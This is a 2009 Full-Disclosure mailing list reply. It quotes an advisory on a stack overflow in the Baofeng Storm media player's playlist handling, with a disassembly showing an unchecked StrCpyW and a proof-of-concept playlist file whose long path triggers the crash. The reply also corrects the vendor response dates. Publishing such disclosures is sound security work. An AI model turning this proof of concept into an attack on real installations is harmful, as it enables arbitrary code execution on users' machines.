[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Baofeng Media Player playlist stack overflow vulnerability



Vendor Response:
2009.06.24 Vendor notified via phone
2009.06.26 Vendor release new version

[Vendor notify me that the date of report and response in my advisory is
wrong]


2009/6/29 Jambalaya . <jambalaya.maillist@xxxxxxxxx>

> Baofeng Media Player playlist stack overflow vulnerability
>
> By Jambalaya of Nevis Labs
> Date: 2009.06.24
>
>
> Vender:
> Baofeng
>
> Affected:
> Storm 3.9.62
> *Other version may also be affected
>
> Overview:
> Baofeng is a widely popular media player in China, and it plays many common
> media file formats. There are almost 120 million customer using baofeng
> media player in China.
>
> Details:
> The specific flaws exists in medialib.dll. the stack overflow
> vulnerablility is due to the way it incorrectly handle smpl file type which
> is a playlist.Succssfully exploiting this vulnerability allows attackers to
> execute arbitrary code on vulnerable installation.
>
> the vulnerability could be triggered when it pass a long path, and lack
> legal examine on the length of path:
>
> .text:1000567B ; int __stdcall sub_1000567B(LPCWSTR pszUrl,DWORD pcchPath)
> .text:1000567B sub_1000567B    proc near               ; DATA XREF:
> .rdata:100248D4 o
> .text:1000567B
> .text:1000567B FileName        = word ptr -628h
> .text:1000567B var_10          = dword ptr -10h
> .text:1000567B var_C           = dword ptr -0Ch
> .text:1000567B var_4           = dword ptr -4
> .text:1000567B pszUrl          = dword ptr  8
> .text:1000567B pcchPath        = dword ptr  0Ch
> .text:1000567B
> .text:1000567B                 mov     eax, offset sub_100221F8
> .text:10005680                 call    __EH_prolog
> .text:10005685                 sub     esp, 61Ch
> .text:1000568B                 push    ebx
> .text:1000568C                 push    esi
> .text:1000568D                 mov     esi, [ebp+pszUrl]
> .text:10005690                 mov     [ebp+var_10], ecx
> .text:10005693                 test    esi, esi
> .text:10005695                 jz      loc_1000577D
> .text:1000569B                 mov     ebx, [ebp+pcchPath]
> .text:1000569E                 test    ebx, ebx
> .text:100056A0                 jz      loc_1000577D
> .text:100056A6                 push    edi
> .text:100056A7                 push    esi             ; pszPath
> .text:100056A8                 xor     edi, edi
> .text:100056AA                 mov     [ebp+pcchPath], 208h
> .text:100056B1                 call    ds:PathIsURLW
> .text:100056B7                 test    eax, eax
> .text:100056B9                 jz      short loc_100056E0
> .text:100056BB                 push    3               ; UrlIs
> .text:100056BD                 push    esi             ; pszUrl
> .text:100056BE                 call    ds:UrlIsW
> .text:100056C4                 test    eax, eax
> .text:100056C6                 jz      short loc_100056E0
> .text:100056E0 loc_100056E0:                           ; CODE XREF:
> sub_1000567B+3E j
> .text:100056E0                                         ; sub_1000567B+4B j
> .text:100056E0                 lea     eax, [ebp+FileName]
> .text:100056E6                 push    esi
> .text:100056E7                 push    eax
> .text:100056E8                 call    ds:StrCpyW
> <---------------------strcpy directly with out any examiation.
>
> Proof of concept:
> <playlist><item name="2.GIF" source="C:\Documents and
> Settings\Linlin\桌面\2.GIF" duration="0"/><item name="0001.gif"
> source="C:\Documents and
> Settings\Linlin\桌面\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif"
> duration="0"/></playlist>
>
>
> Greetz to those friends who I have long time no see T_T:Pratik Dixit,
> Sanjay pendse, Winny Thomas, ajit.hatti
>
> Vendor Response:
> 2009.06.16 Vendor notified via email
> 2009.06.25 Vendor release new version
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/